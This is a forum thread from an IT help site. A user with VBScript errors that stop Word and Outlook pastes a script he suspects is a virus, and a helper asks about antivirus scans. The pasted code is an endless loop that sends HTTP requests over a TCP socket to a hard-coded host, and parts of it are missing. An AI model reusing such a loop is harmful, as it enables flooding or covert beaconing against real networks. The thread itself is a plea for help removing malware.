Tek-Tips is the largest IT community on the Internet today!

Members share and learn making Tek-Tips Forums the best source of peer-reviewed technical information on the Internet!

  • Congratulations TouchToneTommy on being selected by the Tek-Tips community for having the most helpful posts in the forums last week. Way to Go!

script host syntax error

Status
Not open for further replies.

tom9698

Technical User
Jul 5, 2004
17
US
i am getting a syntax error code 800 A03EA vb script error that has stopped Word from opening any documents and has caused outlook to stop--any ideas on how to correct these errors--Microsoft help--is no help
tom9698
 
Could we get a bit more information?

When do you get this error? Please describe exactly the circumstances.

Gerry
 
it started on the 29th of June--I think it is a virus because when I deleted it--it came back here is what it looks like:
On Error Resume Next
set wsTCP=CreateObject("oswinsck.TCP")
Head = "GET " & " & " HTTP/1.0" & vbCrLf & "Accept: */*" & vbCrLf & "User-Agent: " & "Mozilla/4.0 (compatible; MSIE 6.0; Win32)" & vbcrlf & "Host: 192.168.1.101" & vbCrLf & vbCrLf
Do
If wsTCP.Connect("", ) = 0 Then
wsTCP.SendData Head
wsTCP.Disconnect
End If
loop
I'm trying to get rid of it
any ideas?
tom
 
Ouch. Sounds like a virus to me. When you say "deleted it", what exactly did you delete?

Gerry
 
I tried to delete the exploere 5.vbs file but it came back
tom
 
Oh-oh. Hmmmm. Is your AV software up to date? Have you tried to specifically scan that file? When you delete it, does it show as deleted, then reappear?

Gerry
 
Status
Not open for further replies.

Part and Inventory Search

Sponsor

Back
Top